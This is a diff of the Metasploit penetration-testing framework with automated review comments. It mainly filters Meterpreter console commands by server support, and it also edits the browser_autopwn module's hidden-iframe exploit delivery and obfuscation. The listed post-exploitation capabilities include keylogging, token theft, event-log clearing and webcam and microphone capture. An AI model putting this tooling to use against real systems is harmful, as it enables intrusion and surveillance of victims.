+ request.add_tlv(TLV_TYPE_SNIFFER_BYTE_COUNT, len.to_i)
response = client.send_request(request, 3600)
{
:bytes => response.get_tlv_value(TLV_TYPE_SNIFFER_BYTE_COUNT),
:data => response.get_tlv_value(TLV_TYPE_SNIFFER_PACKET)
}
end
-
+
end
end; end; end; end; end
10 lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@@ -43,11 +43,9 @@ def commands
"close" => "Closes a channel",
"channel" => "Displays information about active channels",
"exit" => "Terminate the meterpreter session",
- "detach" => "Detach the meterpreter session (for http/https)",
"help" => "Help menu",
"interact" => "Interacts with a channel",
"irb" => "Drop into irb scripting mode",
- "migrate" => "Migrate the server to another process",
"use" => "Deprecated alias for 'load'",
"load" => "Load one or more meterpreter extensions",
"quit" => "Terminate the meterpreter session",
@@ -61,6 +59,14 @@ def commands
"enable_unicode_encoding" => "Enables encoding of unicode strings",
"disable_unicode_encoding" => "Disables encoding of unicode strings"
}
+
+ if client.passive_service
+ c["detach"] = "Detach the meterpreter session (for http/https)"
+ end
+ if client.commands.include? "core_migrate"
+ c["migrate"] = "Migrate the server to another process"
+ end
+
if (msf_loaded?)
c["info"] = "Displays information about a Post module"
end
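Review bot: `client.commands.include? "core_migrate"` can only be true if core command names are ever pushed into `client.commands`, but in this commit the list is populated solely from `core_loadlib` responses (see `load_library` in client_core.rb), which enumerate the commands an extension just registered; the static core table in base.c is never reported. Unless another path adds `core_*` names, `migrate` disappears for every session. Either have the server report its core commands as well, or fall back to showing `migrate` when the platform is known to support it.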
72 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb
@@ -34,24 +34,56 @@ class Console::CommandDispatcher::Stdapi::Fs
# List of supported commands.
#
def commands
- {
+ all = {
"cat" => "Read the contents of a file to the screen",
"cd" => "Change directory",
+ "del" => "Delete the specified file",
"download" => "Download a file or directory",
"edit" => "Edit a file",
+ "getlwd" => "Print local working directory",
"getwd" => "Print working directory",
+ "lcd" => "Change local working directory",
+ "lpwd" => "Print local working directory",
"ls" => "List files",
"mkdir" => "Make directory",
"pwd" => "Print working directory",
+ "rm" => "Delete the specified file",
"rmdir" => "Remove directory",
+ "search" => "Search for files",
"upload" => "Upload a file or directory",
- "lcd" => "Change local working directory",
- "getlwd" => "Print local working directory",
- "lpwd" => "Print local working directory",
- "rm" => "Delete the specified file",
- "del" => "Delete the specified file",
- "search" => "Search for files"
}
+
+ reqs = {
+ "cat" => [ ],
+ "cd" => [ "stdapi_fs_chdir" ],
+ "del" => [ "stdapi_fs_rm" ],
+ "download" => [ ],
+ "edit" => [ ],
+ "getlwd" => [ ],
+ "getwd" => [ "stdapi_fs_getwd" ],
+ "lcd" => [ ],
+ "lpwd" => [ ],
+ "ls" => [ "stdapi_fs_stat", "stdapi_fs_ls" ],
+ "mkdir" => [ "stdapi_fs_mkdir" ],
+ "pwd" => [ "stdapi_fs_getwd" ],
+ "rmdir" => [ "stdapi_fs_delete_dir" ],
+ "rm" => [ "stdapi_fs_rm" ],
+ "search" => [ "stdapi_fs_search" ],
+ "upload" => [ ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
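Review bot: the `all` / `reqs` / `delete_if` block is duplicated verbatim across fs.rb, net.rb, sys.rb, ui.rb and webcam.rb; factor it into a helper on the common dispatcher base (something like `filter_commands(all, reqs)`) so the filtering rule lives in one place. Also `reqs[cmd].each` raises NoMethodError for any command present in `all` but missing from `reqs`; use `reqs.fetch(cmd)` to fail with a clear message, or `(reqs[cmd] || [])` to default to "no requirements".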
#
@@ -65,18 +97,18 @@ def name
# Search for files.
#
def cmd_search( *args )
-
+
root = nil
glob = nil
recurse = true
-
+
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "Help Banner." ],
"-d" => [ true, "The directory/drive to begin searching from. Leave empty to search all drives. (Default: #{root})" ],
"-f" => [ true, "The file pattern glob to search for. (e.g. *secret*.doc?)" ],
"-r" => [ true, "Recursivly search sub directories. (Default: #{recurse})" ]
)
-
+
opts.parse(args) { | opt, idx, val |
case opt
when "-h"
@@ -92,14 +124,14 @@ def cmd_search( *args )
recurse = false if( val =~ /^(f|n|0)/i )
end
}
-
+
if( not glob )
print_error( "You must specify a valid file glob to search for, e.g. >search -f *.doc" )
return
end
-
+
files = client.fs.file.search( root, glob, recurse )
-
+
if( not files.empty? )
print_line( "Found #{files.length} result#{ files.length > 1 ? 's' : '' }..." )
files.each do | file |
@@ -112,9 +144,9 @@ def cmd_search( *args )
else
print_line( "No files matching your search were found." )
end
-
+
end
-
+
#
# Reads the contents of a file and prints them to the screen.
#
@@ -169,7 +201,7 @@ def cmd_lcd(*args)
return true
end
-
+
#
# Delete the specified file.
#
@@ -183,7 +215,7 @@ def cmd_rm(*args)
return true
end
-
+
alias :cmd_del :cmd_rm
def cmd_download_help
@@ -192,7 +224,7 @@ def cmd_download_help
print_line "Downloads remote files and directories to the local machine."
print_line @@download_opts.usage
end
-
+
#
# Downloads a file or directory from the remote machine to the local
# machine.
@@ -250,7 +282,7 @@ def cmd_download(*args)
}
end
}
-
+
return true
end
@@ -454,7 +486,7 @@ def cmd_upload(*args)
}
end
}
-
+
return true
end
29 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb
@@ -54,12 +54,39 @@ def cleanup
# List of supported commands.
#
def commands
- {
+ all = {
"ipconfig" => "Display interfaces",
"ifconfig" => "Display interfaces",
"route" => "View and modify the routing table",
"portfwd" => "Forward a local port to a remote service",
}
+ reqs = {
+ "ipconfig" => [ "stdapi_net_config_get_interfaces" ],
+ "ifconfig" => [ "stdapi_net_config_get_interfaces" ],
+ "route" => [
+ # Also uses these, but we don't want to be unable to list them
+ # just because we can't alter them.
+ #"stdapi_net_config_add_route",
+ #"stdapi_net_config_remove_route",
+ "stdapi_net_config_get_routes"
+ ],
+ # Only creates tcp channels, which is something whose availability
+ # we can't check directly at the moment.
+ "portfwd" => [ ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
74 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -48,23 +48,67 @@ class Console::CommandDispatcher::Stdapi::Sys
# List of supported commands.
#
def commands
- {
- "clearev" => "Clear the event log",
- "execute" => "Execute a command",
- "getpid" => "Get the current process identifier",
- "getuid" => "Get the user that the server is running as",
- "getprivs" => "Attempt to enable all privileges available to the current process",
- "kill" => "Terminate a process",
- "ps" => "List running processes",
- "reboot" => "Reboots the remote computer",
- "reg" => "Modify and interact with the remote registry",
- "rev2self" => "Calls RevertToSelf() on the remote machine",
- "sysinfo" => "Gets information about the remote system, such as OS",
- "shell" => "Drop into a system command shell",
- "shutdown" => "Shuts down the remote computer",
- "steal_token" => "Attempts to steal an impersonation token from the target process",
+ all = {
+ "clearev" => "Clear the event log",
"drop_token" => "Relinquishes any active impersonation token.",
+ "execute" => "Execute a command",
+ "getpid" => "Get the current process identifier",
+ "getprivs" => "Attempt to enable all privileges available to the current process",
+ "getuid" => "Get the user that the server is running as",
+ "kill" => "Terminate a process",
+ "ps" => "List running processes",
+ "reboot" => "Reboots the remote computer",
+ "reg" => "Modify and interact with the remote registry",
+ "rev2self" => "Calls RevertToSelf() on the remote machine",
+ "shell" => "Drop into a system command shell",
+ "shutdown" => "Shuts down the remote computer",
+ "steal_token" => "Attempts to steal an impersonation token from the target process",
+ "sysinfo" => "Gets information about the remote system, such as OS",
}
+ reqs = {
+ "clearev" => [ "stdapi_sys_eventlog_open", "stdapi_sys_eventlog_clear" ],
+ "drop_token" => [ "stdapi_sys_config_drop_token" ],
+ "execute" => [ "stdapi_sys_process_execute" ],
+ "getpid" => [ "stdapi_sys_process_getpid" ],
+ "getprivs" => [ "stdapi_sys_config_getprivs" ],
+ "getuid" => [ "stdapi_sys_config_getuid" ],
+ "kill" => [ "stdapi_sys_process_kill" ],
+ "ps" => [ "stdapi_sys_process_get_processes" ],
+ "reboot" => [ "stdapi_sys_power_exitwindows" ],
+ "reg" => [
+ "stdapi_registry_load_key",
+ "stdapi_registry_unload_key",
+ "stdapi_registry_open_key",
+ "stdapi_registry_open_remote_key",
+ "stdapi_registry_create_key",
+ "stdapi_registry_delete_key",
+ "stdapi_registry_close_key",
+ "stdapi_registry_enum_key",
+ "stdapi_registry_set_value",
+ "stdapi_registry_query_value",
+ "stdapi_registry_delete_value",
+ "stdapi_registry_query_class",
+ "stdapi_registry_enum_value",
+ ],
+ "rev2self" => [ "stdapi_sys_config_rev2self" ],
+ "shell" => [ "stdapi_sys_process_execute" ],
+ "shutdown" => [ "stdapi_sys_power_exitwindows" ],
+ "steal_token" => [ "stdapi_sys_config_steal_token" ],
+ "sysinfo" => [ "stdapi_sys_config_sysinfo" ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
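Review bot: `reg` is gated on all thirteen `stdapi_registry_*` methods, so a server that implements only part of the registry API (say `open_key`, `query_value`, `enum_key`) loses the whole `reg` command even though its read-only subcommands would work; require the minimal subset the `reg` dispatcher needs to start, and let the individual subcommands report a missing method when invoked. The `reboot` and `shutdown` entries both mapping to `stdapi_sys_power_exitwindows` is correct given the single server handler.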
#
40 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb
@@ -20,20 +20,50 @@ class Console::CommandDispatcher::Stdapi::Ui
# List of supported commands.
#
def commands
- {
- "idletime" => "Returns the number of seconds the remote user has been idle",
- "uictl" => "Control some of the user interface components",
+ all = {
"enumdesktops" => "List all accessible desktops and window stations",
"getdesktop" => "Get the current meterpreter desktop",
- "setdesktop" => "Change the meterpreters current desktop",
+ "idletime" => "Returns the number of seconds the remote user has been idle",
+ "keyscan_dump" => "Dump the keystroke buffer",
"keyscan_start" => "Start capturing keystrokes",
"keyscan_stop" => "Stop capturing keystrokes",
- "keyscan_dump" => "Dump the keystroke buffer",
"screenshot" => "Grab a screenshot of the interactive desktop",
+ "setdesktop" => "Change the meterpreters current desktop",
+ "uictl" => "Control some of the user interface components",
# not working yet
# "unlockdesktop" => "Unlock or lock the workstation (must be inside winlogon.exe)",
}
+
+ reqs = {
+ "enumdesktops" => [ "stdapi_ui_desktop_enum" ],
+ "getdesktop" => [ "stdapi_ui_desktop_get" ],
+ "idletime" => [ "stdapi_ui_get_idle_time" ],
+ "keyscan_dump" => [ "stdapi_ui_get_keys" ],
+ "keyscan_start" => [ "stdapi_ui_start_keyscan" ],
+ "keyscan_stop" => [ "stdapi_ui_stop_keyscan" ],
+ "screenshot" => [ "stdapi_ui_desktop_screenshot" ],
+ "setdesktop" => [ "stdapi_ui_desktop_set" ],
+ "uictl" => [
+ "stdapi_ui_enable_mouse",
+ "stdapi_ui_disable_mouse",
+ "stdapi_ui_enable_keyboard",
+ "stdapi_ui_disable_keyboard",
+ ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
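Review bot: the `reqs` table plus `delete_if` loop is now pasted verbatim into sys.rb, ui.rb and webcam.rb (and presumably the other stdapi dispatchers). Factor the filter into one helper on the base command dispatcher, e.g. `filter_commands(all, reqs)`, so any change to how `client.commands` is consulted only has to be made in one place.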
20 lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb
@@ -20,11 +20,29 @@ class Console::CommandDispatcher::Stdapi::Webcam
# List of supported commands.
#
def commands
- {
+ all = {
"webcam_list" => "List webcams",
"webcam_snap" => "Take a snapshot from the specified webcam",
"record_mic" => "Record audio from the default microphone for X seconds"
}
+ reqs = {
+ "webcam_list" => [ "webcam_list" ],
+ "webcam_snap" => [ "webcam_start", "webcam_get_frame", "webcam_stop" ],
+ "record_mic" => [ "webcam_record_audio" ],
+ }
+
+ all.delete_if do |cmd, desc|
+ del = false
+ reqs[cmd].each do |req|
+ next if client.commands.include? req
+ del = true
+ break
+ end
+
+ del
+ end
+
+ all
end
#
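Review bot: a session whose `client.commands` comes back empty (an older meterpreter build that cannot enumerate the commands it implements) now loses every webcam command, and the operator gets no message saying why. Consider falling back to the unfiltered `all` when the session cannot report its command list, or at least print a warning so a missing `webcam_list` is not mistaken for a missing extension.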
9 lib/rex/text.rb
@@ -239,6 +239,15 @@ def self.to_unescape(data, endian=ENDIAN_LITTLE)
return buff
end
+ def self.to_octal(str, prefix = "\\")
+ octal = ""
+ str.each_byte { |b|
+ octal << "#{prefix}#{b.to_s 8}"
+ }
+
+ return octal
+ end
+
#
# Returns the hex version of the supplied string
#
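Review bot: `b.to_s 8` emits variable-width octal (`\12` for a newline, `\101` for `A`), which is only unambiguous because every byte carries its own prefix; a consumer expecting fixed three-digit C-style escapes, or anything that appends literal digits after the result, will misparse it. `"%03o" % b` gives a fixed width. Also give the method the `# Returns the octal version of the supplied string` doc comment that the neighbouring method carries, and document what `prefix` is for.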
20 modules/auxiliary/server/browser_autopwn.rb
@@ -60,6 +60,11 @@ def initialize(info = {})
],
'PassiveActions' =>
[ 'WebServer', 'DefangedDetection' ],
+ 'DefaultOptions' => {
+ # We know that most of these exploits will crash the browser, so
+ # set the default to run migrate right away if possible.
+ "InitialAutoRunScript" => "migrate -f",
+ },
'DefaultAction' => 'WebServer'))
register_options([
@@ -69,9 +74,6 @@ def initialize(info = {})
], self.class)
register_advanced_options([
- # We know that most of these exploits will crash the browser, so
- # set the default to run migrate right away if possible.
- OptString.new('InitialAutoRunScript', [false, "An initial script to run on session created (before AutoRunScript)", 'migrate -f']),
OptString.new('AutoRunScript', [false, "A script to automatically on session creation.", '']),
OptBool.new('AutoSystemInfo', [true, "Automatically capture system information on initialization.", true]),
OptString.new('MATCH', [false,
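Review bot: dropping the `OptString.new('InitialAutoRunScript', ...)` registration means this module no longer declares the option itself; the `DefaultOptions` entry added in the previous hunk only seeds the datastore value. Unless a mixin this module already includes registers the option, it will no longer show up in `show advanced` and its description ("An initial script to run on session created (before AutoRunScript)") is lost. Please confirm where the option is now registered, or keep the registration and only move the default.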
@@ -109,7 +111,7 @@ def initialize(info = {})
'The port to use for generic reverse-connect payloads', 6666
]),
OptString.new('PAYLOAD_GENERIC', [false,
- 'The payload to use for generic reverse-connect payloads6',
+ 'The payload to use for generic reverse-connect payloads',
'generic/shell_reverse_tcp'
]),
OptPort.new('LPORT_JAVA', [false,
@@ -703,14 +705,14 @@ def build_script_response(cli, request)
str = '';
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
document.body.innerHTML += (str);
- }
- window.next_exploit = function (exploit_idx) {
+ };
+ window.next_exploit = function(exploit_idx) {
#{js_debug("'next_exploit(' + exploit_idx +')<br>'")}
if (!global_exploit_list[exploit_idx]) {
#{js_debug("'End<br>'")}
return;
}
- #{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + '<br>'")}
+ #{js_debug("'trying ' + global_exploit_list[exploit_idx].resource + ' of ' + global_exploit_list.length + '<br>'")}
// Wrap all of the vuln tests in a try-catch block so a
// single borked test doesn't prevent other exploits
// from working.
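Review bot: the new debug string prints `resource + ' of ' + global_exploit_list.length`, so the output reads "trying <resource> of 12", as if the number were part of the resource name. If the intent is a progress indicator, print `(exploit_idx + 1) + '/' + global_exploit_list.length` next to the resource instead.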
@@ -739,7 +741,7 @@ def build_script_response(cli, request)
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
window.next_exploit(exploit_idx+1);
};
- }
+ };
ENDJS
sploits_for_this_client = []
@@ -828,7 +830,7 @@ def build_script_response(cli, request)
js << "window.next_exploit(0);\n"
js = ::Rex::Exploitation::JSObfu.new(js)
- js.obfuscate
+ js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}"
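Review bot: `js.obfuscate unless datastore["DEBUG"]` reads the raw datastore value; if `DEBUG` is not declared as an `OptBool` on this module (the hunk does not show where it is registered), a string such as "false" is truthy and obfuscation is still skipped. Declare it as an OptBool, or key off whatever option `js_debug` already uses, so the debug prints and the obfuscation switch follow the same flag. A comment noting that unobfuscated JS is only for debugging, since it is trivially signaturable by client-side AV, would also help the next reader.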
3  modules/exploits/multi/browser/java_rhino.rb
@@ -13,6 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java Applet Rhino Script Engine Remote Code Execution',
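Review bot: `autopwn_info({ :javascript => false })` registers the module with Browser Autopwn without any client-side check, so the applet will be served to every browser whether or not a Java plugin is present. Unless that is intended, supply the detection keys `autopwn_info` accepts (a JavaScript vuln test that checks for Java, e.g. `navigator.javaEnabled()`, or OS/user-agent constraints) so the exploit is not pushed at clients that cannot run it.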
15 modules/post/osx/gather/enum_adium.rb
@@ -224,21 +224,14 @@ def dir(path)
# and retry under certain conditions.
#
def exec(cmd)
- tries = 0
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
- tries += 1
- if tries < 3
- vprint_error("#{@peer} - #{e.message} - retrying...")
- retry
- end
+ vprint_error("#{@peer} - #{e.message} - retrying...")
+ retry
rescue EOFError => e
- tries += 1
- if tries < 3
- vprint_error("#{@peer} - #{e.message} - retrying...")
- retry
- end
+ vprint_error("#{@peer} - #{e.message} - retrying...")
+ retry
end
end
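Review bot: removing the `tries` counter turns both rescue branches into unbounded `retry` loops: a session that keeps timing out, or a channel that is already closed and raises EOFError on every call, will spin forever, while the log line still says "retrying..." as if the retry were bounded. The method comment above ("retry under certain conditions") no longer matches either. Keep a bound (`tries += 1; retry if tries < 3`) and return or raise after the last attempt, or say in the commit why unbounded retry is wanted here.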
2  test/modules/post/test/file.rb
@@ -1,5 +1,5 @@
-require 'module_test'
+require 'test/lib/module_test'
#load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb'
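Review bot: `require 'test/lib/module_test'` resolves against the load path and cwd, so it only works when msfconsole is started from the framework root, and it is the opposite of what test/modules/post/test/meterpreter.rb does in this same commit (`$:.push "test/lib"` then `require 'module_test'`). Requiring the same file under two different feature names can also load it twice. Pick one mechanism for all three test modules, preferably one independent of cwd, for example building the path from `Msf::Config.install_root`. The commented-out `#load` lines that follow can go as well.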
25 test/modules/post/test/meterpreter.rb
@@ -3,8 +3,7 @@
require 'rex'
$:.push "test/lib" unless $:.include? "test/lib"
-#require 'module_test'
-load 'test/lib/module_test.rb'
+require 'module_test'
class Metasploit4 < Msf::Post
@@ -38,6 +37,11 @@ def test_sys_config
end
def test_net_config
+ unless (session.commands.include? "stdapi_net_config_get_interfaces")
+ vprint_status("This meterpreter does not implement get_interfaces, skipping tests")
+ return
+ end
+
vprint_status("Starting networking tests")
it "should return network interfaces" do
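Review bot: the skip is only reported via `vprint_status`, so with VERBOSE off the whole networking test group silently disappears and the run looks like a clean pass. Use `print_status` (or whatever the harness uses to record skipped groups) so a session missing `stdapi_net_config_get_interfaces` is visible in the output.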
@@ -160,16 +164,19 @@ def test_fs
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
- res &&= session.fs.dir.entries.include?(remote)
+ res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
- session.fs.file.download(remote, remote)
- res &&= ::File.file? remote
- downloaded_contents = ::File.read(remote)
+ fd = session.fs.file.new(remote, "rb")
+ uploaded_contents = fd.read
+ until (fd.eof?)
+ uploaded_contents << fd.read
+ end
+ fd.close
original_contents = ::File.read(local)
- res &&= !!(downloaded_contents == original_contents)
- ::File.unlink remote
+
+ res &&= !!(uploaded_contents == original_contents)
end
session.fs.file.rm(remote)
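Review bot: the read loop does `uploaded_contents = fd.read` and then `<<` inside `until fd.eof?`; if that first `read` comes back nil (an empty file, for instance) the `<<` raises NoMethodError. Start from an empty string and append in the loop (`uploaded_contents = ''; uploaded_contents << fd.read until fd.eof?`) and close `fd` in an `ensure` so a failed read does not leak the channel. The remote side is opened with "rb" but the local comparison uses `::File.read(local)`, which is text mode on Windows; use `::File.binread(local)` so the byte-for-byte comparison also holds on a Windows msf host.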
@@ -183,7 +190,7 @@ def test_fs
vprint_status("uploading")
session.fs.file.upload_file(remote, local)
vprint_status("done")
- res &&= session.fs.dir.entries.include?(remote)
+ res &&= session.fs.file.exists?(remote)
vprint_status("remote file exists? #{res.inspect}")
if res
2  test/modules/post/test/unix.rb
@@ -1,5 +1,5 @@
-require 'module_test'
+require 'test/lib/module_test'
#load 'test/lib/module_test.rb'
#load 'lib/rex/text.rb'